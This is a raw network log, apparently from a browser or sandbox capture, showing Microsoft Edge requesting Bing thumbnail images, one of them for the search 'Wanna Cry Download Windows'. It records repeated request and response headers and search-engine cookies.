cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3111
x-check-cacheable: YES
cache-control: public, max-age=3172888
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51252
GET

https://th.bing.com/th?q=Wanna+Cry+Download+Windows&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?q=Wanna+Cry+Download+Windows&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2627
cache-control: public, max-age=569923
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51264
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.e3b319c8-4954-4658-b082-6097e00a5f04&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.e3b319c8-4954-4658-b082-6097e00a5f04&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9573
cache-control: public, max-age=1209600
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51214
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.bf5004ca-28ef-4f24-b581-5f30431d9014&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.bf5004ca-28ef-4f24-b581-5f30431d9014&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1430
x-check-cacheable: YES
cache-control: public, max-age=1705128
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51286
GET

https://th.bing.com/th?id=ODLS.35a3ca70-3ef3-43e8-a326-5609b3e92ce9&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.35a3ca70-3ef3-43e8-a326-5609b3e92ce9&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 747
x-check-cacheable: YES
cache-control: public, max-age=817325
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b5128a
GET

https://th.bing.com/th?id=OIP.Jb1mqGH4NYIpx-4_PqSsMgHaFk&w=80&h=80&c=1&vt=10&bgcl=364f77&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.Jb1mqGH4NYIpx-4_PqSsMgHaFk&w=80&h=80&c=1&vt=10&bgcl=364f77&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 877
x-check-cacheable: YES
cache-control: public, max-age=1244709
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b5128b
GET

https://th.bing.com/th?id=ODLS.5be76585-07ee-4d6b-8d21-0e70e3dff7cc&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.5be76585-07ee-4d6b-8d21-0e70e3dff7cc&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
